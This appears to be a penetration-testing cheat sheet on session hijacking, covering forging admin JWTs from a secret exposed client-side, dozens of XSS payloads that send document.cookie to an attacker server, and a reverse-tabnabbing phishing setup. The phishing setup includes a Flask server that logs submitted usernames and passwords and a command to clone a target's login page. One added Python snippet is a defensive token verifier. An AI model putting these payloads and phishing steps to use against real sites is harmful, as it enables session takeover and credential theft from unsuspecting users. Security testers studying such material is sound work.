Session Hijacking

Client-Side JWT Attack

If no cookies are generated before registration or login, it is quite possible that the authorization process is being handled client-side.

Enumeration

  1. Open the browser's developer tools and look within the lib folder for the file related to JWT, normally called jwt.js or jwt.ts.

  2. Look for the JWT_SECRET and the signing method.

  3. Use jwt.io or the JWT Editor extension for Burp Suite to craft a new token signed with that secret and give it the admin role.
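As an added example (not code from the original notes), the following stdlib-only HS256 verifier shows what the server side of this looks like and why a JWT_SECRET bundled into jwt.js is fatal: every token signed with that secret passes verification, so no server-side check can tell a forged admin token from a real one. The only fix is to keep the secret server-side. The secret, claims and tokens are constructed sample values; `issue_hs256`, `verify_hs256` and `is_admin` are hypothetical names.

```python
# Added example: server-side HS256 verification. Secret and tokens are constructed.
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-sample-secret"  # must live only on the server, never in jwt.js


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_hs256(claims: dict, secret: bytes) -> str:
    """Server-side issuance; anyone holding a leaked secret can do exactly this."""
    compact = {"separators": (",", ":")}
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    body = _b64url_encode(json.dumps(claims, **compact).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(mac)}"


def verify_hs256(token: str, secret: bytes):
    """Return the claims dict only if the token is well formed, alg is HS256 and the MAC matches."""
    try:
        h, b, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        signature = _b64url_decode(s)
        claims = json.loads(_b64url_decode(b))
    except ValueError:  # wrong part count, bad base64 or bad JSON (UnicodeDecodeError is a ValueError)
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None  # refuses alg=none and algorithm-confusion headers
    expected = hmac.new(secret, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):  # constant-time comparison
        return None
    return claims if isinstance(claims, dict) else None


def is_admin(token: str, secret: bytes) -> bool:
    """Authorisation decision taken from verified claims only, never from the raw token."""
    claims = verify_hs256(token, secret)
    return claims is not None and claims.get("role") == "admin"
```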

Stealing Cookies via XSS

Error-Based Cookie Stealing

  • Trigger and manipulate error events

Basic image error trigger
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
Using document.location
<img src=1 onerror="document.location='http://<YOUR_SERVER_IP>/'+ document.cookie">
Redirect
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">

Image-Based Cookie Stealing

Image object via script
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
Variable assignment method
<script>var i=new Image(); i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie;</script>

Location-Based Cookie Stealing

Basic location redirect
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Alternative location syntax
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method + Redirect
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Window location method
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method Dynamically
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method + Redirect (href is a property, so it is assigned, not called)
<script>window['location']['href']='http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
String concatenation methods (dynamically join the URL and cookies to redirect)
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
Location + redirect with concatenation of cookies
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>

Advanced Cookie Stealing Methods

Audio object method
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
Document write method
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
XMLHttpRequest method
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="+document.cookie, true);xhttp.send();</script>
Fetch API method (mode 'no-cors', so no response handling is needed)
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
sendBeacon API (stealthier)
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

DOM-Stored Cookie Extraction

Extract a cookie value stored in a DOM element
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})

Reverse Tabnabbing

Documentation and original Writeup

If a link uses target="_blank" and does not include rel="noopener" or rel="noreferrer", the page opened in the new tab gets a reference to the original page via the window.opener object and can navigate it.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site
window.opener.location = 'https://phishing-site.com/login';

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template

app = Flask(__name__)


@app.route('/writeup.html', methods=['GET'])
def writeup():
    return render_template('writeup.html')


@app.route('/accounts/login/', methods=['GET', 'POST'])
def login():
    if request.method == "POST":
        username = request.form.get('login')
        password = request.form.get('password')
        print("Got username and password: {}:{}".format(username, password))
    return render_template('login.html')


app.run(host="10.10.14.172", port=8000)
Alter writeup.html so that it redirects the opener to your own version of login.html:
<!doctype html>
<html>
  <body>
    Example Writeup
    <script>
      if (window.opener)
        window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
      if (window.parent != window)
        window.parent.location.replace('http://10.10.14.172/accounts/login/');
    </script>
  </body>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html
  • Change the CSS and JS imports to point to a more credible site.

  • Launch the attack by submitting the .html file.